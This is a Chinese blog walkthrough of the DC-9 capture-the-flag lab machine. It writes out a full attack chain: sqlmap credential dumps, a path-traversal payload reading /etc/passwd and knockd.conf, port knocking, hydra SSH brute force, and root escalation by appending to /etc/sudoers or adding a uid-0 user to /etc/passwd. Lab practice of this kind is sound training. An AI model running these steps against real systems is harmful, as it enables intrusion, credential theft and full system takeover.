DC-9靶机做题记录

已于 2024-07-22 10:28:52 修改
阅读量998 收藏 19
点赞数 21
分类专栏: 打靶 文章标签: 笔记 安全 网络安全 web安全 http
于 2024-01-24 18:58:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64422989/article/details/135829310
版权

靶机下载地址:

链接:https://pan.baidu.com/s/1LR44-oFnO6NU6bTNs7VNrw?pwd=hzke 
提取码:hzke

参考:

image.png
描述:

DESCRIPTION 说明
DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
DC-9是另一个专门建造的易受攻击实验室,旨在获得渗透测试领域的经验。

The ultimate goal of this challenge is to get root and to read the one and only flag.
这个挑战的最终目标是扎根并阅读唯一的旗帜。

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Linux技能和熟悉Linux命令行是必须的,有一些基本渗透测试工具的经验也是必须的。

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAU7上向我推特寻求帮助,让你重新开始。但请注意:我不会给你答案,相反,我会给你一个如何前进的想法。

TECHNICAL INFORMATION 技术信息
DC-9 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.
DC-9是一个基于Debian 64位构建的VirtualBox虚拟机,但在大多数电脑上运行它应该不会有任何问题。

DC-9 has been tested successfully on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.
DC-9已在VMWare Player上成功测试,但如果在VMWare中运行此VM有任何问题,请仔细阅读。

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
它目前已配置为桥接网络,但可以根据您的要求进行更改。已为DHCP配置网络。

Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.
安装很简单——下载它,解压缩它,然后将它导入VirtualBox或VMWare,然后就可以离开了。

IMPORTANT 重要的
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.
虽然使用此虚拟机应该没有问题,但通过下载它,您将对此虚拟机可能造成的任何意外损坏承担全部责任。

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.
这么说,应该没有任何问题,但我觉得有必要把它扔出去以防万一。

1、导入VMware虚拟机

下载完成后,得到DC-9.ova文件,导入到VMware后,设置靶机和kali的网络连接模式为NAT模式,靶机会自动获取ip地址。

2、拍摄快照,防止后面出问题,有快照还能恢复到初始设置
image.png
3、kali创建一个目录 dc9 ,后续的操作都在该目录下进行
image.png

使用工具

攻击者:kali 192.168.1.128
靶机:dc-9 192.168.1.137

一.信息收集

基础信息查询

0x01 查看存活主机 0x02 查看开放端口 和 0x03 查看端口服务

这几条命令的用法可以看之前的博客,这里不再赘述
image.png

目录扫描
dirsearch -u "192.168.1.137" -e php -i 200
  • -e 表示扫描php
  • -i 表示只看 200状态码的
  • -x 表示不看相关的状态码
  • –random-agent 表示使用随机的UA头

image.png

页面探测

image.png
image.png
测试一下search页面是否存在SQL注入漏洞
image.png
image.png
测试发现,Search页面搜索然后跳到results页面的时候存在SQL注入

二、SQLmap自动化注入

爆库名(用post的方式)

sqlmap -u http://192.168.1.137/results.php --data="search=1" --batch -dbs
  • –data 表示是POST的方式,data是POST带的数据
  • –batch 自动帮我们确定下一步,自动化操作
  • -dbs 显示数据库

image.png

爆表名

  • 先看一下users表的内容
sqlmap -u http://192.168.1.137/results.php --data="search=1" --batch -D users -tables

image.png

爆列名

sqlmap -u http://192.168.1.137/results.php --data="search=1" --batch -D users -T UserDetails --columns

image.png

爆字段

看看username,password

sqlmap -u http://192.168.1.137/results.php --data="search=1" --batch -D users -T UserDetails -C username,password --dump

image.png
这个username和password被sqlmap保存在了一个csv里面
image.png
我们用逗号作为分隔符,把username和password分别保存为两个txt,等一下爆破要用

cat /root/.local/share/sqlmap/output/192.168.1.137/dump/users/UserDetails.csv | awk -F, '{print $1}'

image.png

 cat /root/.local/share/sqlmap/output/192.168.1.137/dump/users/UserDetails.csv | awk -F, '{print $1}' > username.txt

 cat /root/.local/share/sqlmap/output/192.168.1.137/dump/users/UserDetails.csv | awk -F, '{print $2}' > password.txt

image.png

  • 再回去看看刚刚那个Staff数据库

也是一样的顺序和命令

Staff爆表名

sqlmap -u http://192.168.1.137/results.php --data="search=1" --batch -D Staff --tables

image.png

Staff爆列名

sqlmap -u http://192.168.1.137/results.php --data="search=1" --batch -D Staff -T Users --columns

image.png

Staff爆字段

  • 查看一下Username和Password
sqlmap -u http://192.168.1.137/results.php --data="search=1" --batch -D Staff -T Users -C Username,Password --dump

image.png
发现admin账号
密码一眼丁真为MD5加密,找一个在线解密网站解密即可

CMD5查到了但要钱才能解锁,换一个
image.png
换成somd5就可以了,密码为transorbital1
image.png
可以用来登录Web页面
image.png
注意到下面有File does not exist,想到是程序引用或读取了一个不存在的文件才会回显这个,说明可能存在任意文件读取漏洞
image.png
参数名是file,构造payload:

?file=../../../../../../../etc/passwd

image.png

打开SSH端口

ssh 的22端口状态是filtered 的,猜想是运行了knockd 服务,才导致ssh处于关闭状态

port knocking

(参考端口敲门服务):
如字面意思,类似‘敲门’,只是这里敲的是‘端口’,而且需要按照顺序‘敲’端口。如果敲击规则匹配,则可以让防火墙实时更改策略。从而达到开关防火墙的目的。

使用者连接之前必须先依序 '敲击' 指定端口 (port knocking), knockd 才开放受到保护的端口

它的配置文件路径为/etc/knockd.conf
那我们利用任意文件读取漏洞查看一下konckd的配置文件
构造payload:

?file=../../../../../../../etc/knockd.conf

image.png
Ctrl+U查看一下源代码显示得更清楚一点
image.png
配置文件说明需要依次敲击7469,8475,9842这三个端口才行

方法一

使用knock程序

开启
knock  <target>  7000 8000 9000
关闭
knock  <target>  9000 8000 7000
方法二:
Open:
nc -z <target> 7000 8000 9000
Close:
nc -z <target> 9000 8000 7000

我们直接用 nc 吧

nc -z 192.168.1.137 7469 8475 9842

knock 之后就可以看见ssh的22端口是 open 的状态的了
image.png

九头蛇爆破(参考Hydra密码爆破工具使用教程图文教程(超详细)_hydra使用教程-CSDN博客

hydra -L username.txt -P password.txt ssh://192.168.1.137
  • -L 指定用户名字典
  • -P 指定密码字典

image.png
获得三个账号密码,依次登录看看

  • chandlerb里啥也没有

image.png

  • chandlerb里也啥都没有

image.png

  • janitor里有一个密码本

image.png
将这几个密码添加到我们原来的password.txt里面去

echo 'BamBam01                                                              
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts' >> password.txt

image.png
再用九头蛇进行爆破,再跑一遍
发现多了一个fredf账号,密码为B4-Tru3-001
image.png

sudo -l

发现它可以不需要密码,以root权限去执行文件/opt/devstuff/dist/test/test
image.png
cd 到该目录看看
image.png
test.py表名

  1. 运行需要三个参数,第一个参数就是test执行文件它本身
  2. 第二个参数就是会执行读取第二个文件的内容的操作
  3. 第三个参数是把第二个文件的内容追加到第三个文件中,因为它用的是“a”这个模式,a是append,追加的意思

提权

方法一:

有一个叫sudo的东西
sudo就是正常情况下,你想要以非root用户执行一条root命令的话,就需要用到它
而sudo它有一个/etc/sudoers文件
这个文件配置了你能做什么操作
root ALL=(ALL:ALL) ALL就说明root什么都能做
image.png
所以我们需要在/etc/sudoers下追加一条命令,让我们这个用户能做ALL所有事情

fredf    ALL=(ALL:ALL) ALL

我们现在当前目录下创建一个a.txt,添加如下的内容
image.png
然后运行test这个可执行文件,把内容添加到 /etc/sudoers 里面去

sudo /opt/devstuff/dist/test/test a.txt /etc/sudoers

image.png
现在就是牛逼的sudoers了,想提权就敲这条命令

sudo su -
  • sudo 就是我要用root用户去执行root命令
  • su 就是提权
    • 就是切换到它的环境变量里

image.png
下载就可以在/root目录下获得最终的flag了
image.png

方法二:

原理: /etc/passwd 文件中含有的用户会去 /etc/shadow 文件中校验,如果 /etc/shadow 文件中没有则会无密码直接su切换用户

先利用openssl命令创建一个密码

openssl passwd -1 -salt <用户名> <密码>

得到hash密码,$1$hacker$TzyKlv0/R/c28R.GAeLw.1
接着到tmp目录新建一个文件

cd /tmp
 
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0::/root:/bin/bash' > hacker

这里有个注意的地方,写入的时候必须是单引号,也就是echo ‘…’,不能是echo “…”,双引号会导致最后失败
对内容的解释,passwd文件每一行的格式如下:

  • 用户名:密码(hash):uid:gid:说明:家目录:登陆后使用的shell

image.png
然后运行脚本,把内容添加到 /etc/passwd 文件里面去

sudo /opt/devstuff/dist/test/test hacker /etc/passwd

image.png
切换到/roor目录就可以发现flag了

总结:

  1. 信息收集,目录扫描,开头的步骤很重要
  2. SQlmap自动化注入的操作了解加深
  3. 了解到了Knock服务
  4. Hydra工具的使用
  5. 提权,对/etc/pawwd 文件格式的了解,以及对/etc/sudoers 文件的了解

完毕!

Fab1an要努力~
关注
  • 21
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC-6靶机做题记录
Fab1an的博客
01-21 1295
hosts文件域名解析对WordPress的了解程度,比如后台是wp-admin,还有一个readme.htmlWordPress的扫描器叫wpscan,以及wpscan的用法,可以百度要会爆破它的用户名和密码,可以用BurpSuite或者wpscan去爆破,也可以用hydra或者其他的一些方式进入后台找寻一个能写php代码的地方,把shell弹回来找到一个插件的漏洞,然后用它来反弹shellnamp提权,用nse脚本提权。
DC-8靶机做题记录
Fab1an的博客
01-23 990
信息收集很重要,从robots.txt和扫目录的时候获得后台登录的目录对SQL注入的认识要能意识到是否存在SQL注入,还有对SQLmap的使用要熟练密码爆破工具john的用法反弹shell的一句话要熟练还有优化shell的命令最后提权,对漏洞库的用法和搜索要熟练。
DC-5靶机做题记录
Fab1an的博客
01-20 1376
信息收集很重要学到反弹shell,日志文件包含FUZZpython启动HTTP服务学到了提权的知识点巩固。
DC-7靶机做题记录
Fab1an的博客
01-21 1002
第一步非常难,就是要找到它的Github的信息泄露对drush的了解,可能国外的人用到就比较多要解决它支持PHP代码的问题,需要安装支持PHP的插件对定时任务的了解,邮件的定时任务,能够去发现一些脚本的内容。
vulnhub-DC-9靶机渗透记录(适合新手详细版)
m0_62584974的博客
09-09 1355
vulnhub-DC-9靶机渗透记录,超详细,适合新手
DC-1靶机(新手村)
weixin_42238862的博客
02-14 1万+
今天开始呢,我打算开始一系列的渗透测试靶机教程,有不足的地方,希望大佬抬手轻喷!毕竟学生党写这个也就是为了记录一下自己渗透测试过程中学到的东西,希望能帮助刚刚进来的同学!!!不多说我们开始今天的DC-1靶机 首先呢当然是进行信息收集,信息收集当然得先去看看对面是谁了呀,都不知道对面是谁怎么打它对不对,知道对面是谁就是确定目标机的IP地址,那我起手就是arp-scan进行探测局域网内存活的主机了呀! 至于为什么判断这个是目标机的原因就很简单了,我们对每个IP的信息进行分析,xiaomi自然就是我得虚拟手机了
新手DC-1通关思路
SuchAprettyBoi的博客
08-10 565
文章目录前言一、DC-1是什么?二、准备流程1.要用到的工具2.初始化虚拟机3.开始前夕!!!三、开始渗透总结 前言 通关后,来复盘一下,顺便巩固一下学到的新东西 一、DC-1是什么? DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. DC-1 是一个特意建造的易受攻击的靶机环境,目的是在渗透测试领域获得经验。 It
DC系列靶机1通关教程_dc1 靶机
2301_82242964的博客
06-24 942
Meterpreter是Metasploit框架中一种强大的后渗透工具,用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷,可与受感染的目标系统进行远程通信。进程控制:可查看、创建、终止和注入进程。文件系统:可以浏览、上传、下载、编辑和删除文件。系统信息:可获取目标主机的详细信息,如操作系统类型、内核版本等。网络管理:可以查看网络接口、扫描主机、进行端口转发等操作。权限提升:可尝试获取更高的权限,如提升到管理员或SYSTEM权限。
DC-5靶机(2),那些进了大厂的程序员面试前都做了哪些准备
2401_83947105的博客
04-15 388
得知文件包含漏洞,我们可以在ssh日志,中间件日志以及临时文件中写入一句话木马然后进行包含,即可解析。可以看到一个screen-4.5.0,在kali的漏洞库查看是否有提权漏洞。啥玩意没有,点击contact,发现一个留言板,测试了xss啥也没有。以上操作要在bp中发包,我直接在浏览器中修改,不知道为什么无法写入。上面的这个链接试过了可以访问,下面这个链接没试过(可以尝试一下)如上图所示,我试了在浏览器中无法写入日志,打开蚁剑连接shell。上面那个没试过,下面这个试了成功, 都需要在bp中进行操作。
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
热门推荐
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
2024年最全CVE-2024-26923漏洞分析_cve-2024–26923(1),2024最新网易网络安全面试题目
2401_84544363的博客
05-05 1134
本次漏洞产生的主要原因是计算机账户关键属性的ACL设置问题和ADCS检查客户端身份不严格导致,结合之前的samAccountName欺骗漏洞,AD域中涉及身份认证标识的问题不止一次,微软在AD域中不用具有唯一性的自动编号字段SID而是其他字段作为身份认证标识在安全方面着实欠妥。本次漏洞利用简单,流量特征不明显难以检测,同时获取的AD域证书有效时间长,因此对于AD域的提权和权限维持都有很高的利用价值。
[网络安全自学篇] 八十二.WHUCTF之隐写和逆向类解题思路WP(文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析)
杨秀璋的专栏
06-04 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。这篇文章将详细讲解WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
No.1-Bastion-难度简单-HTB-walkthrough
weixin_43851945的博客
01-10 1946
欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体...
对Linux 提权的简单总结
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-30 887
什么是权限 在Linux 系统中,ls -al即可查看列出文件所属的权限。这里我用kali 系统来演示。 …… drwxr-xr-x 2 kali kali 4096 Jan 27 12:52 Downloads -rw-r--r-- 1 root root 903 Jun 14 11:33 exp.html -rw-r--r-- 1 root root 153600 May 5 09:42 flag lrwxrwxrwx 1 kali kali 28 May 1.
维度不固定的多维数组形参笔记
H2z1220的博客
09-05 211
假如我有多个元素个数都不一致的多维数组都需要调用这个函数进行处理,这个形参问题就凸显出来了,总不能创建N个不同的函数来进行处理吧?这样也太繁琐了,而且也适用度不高。这个函数可以传入多维数组,但元素个数必须是固定的,假如传入一个str[][20],元素个数不一样的数组,那么这个函数就不适用了,且会报错。所有数据在存储空间里面都是有地址的,那么就可利用指针寻址来获取到相应的数据。在查找了一些资料后受到了一点启发。而这里也可利用指针来指向多维数组。
C语言:刷题笔记
weixin_45930573的博客
09-04 413
c语言刷题记录
【机器人工具箱Robotics Toolbox开发笔记(十)】机器人微分运动学
m0_72676510的博客
09-07 261
机器人工具箱中,可用函数SerialLink.jacob0()求出对应某个位姿下绝对坐标系中的雅可比矩阵,用SerialLink.jacobn()求出对应某个位姿下工具坐标系中的雅可比矩阵。
【C++学习笔记】数组与指针(三)
最新发布
qq_38196449的博客
09-09 949
0(空字符)
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Fab1an要努力~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值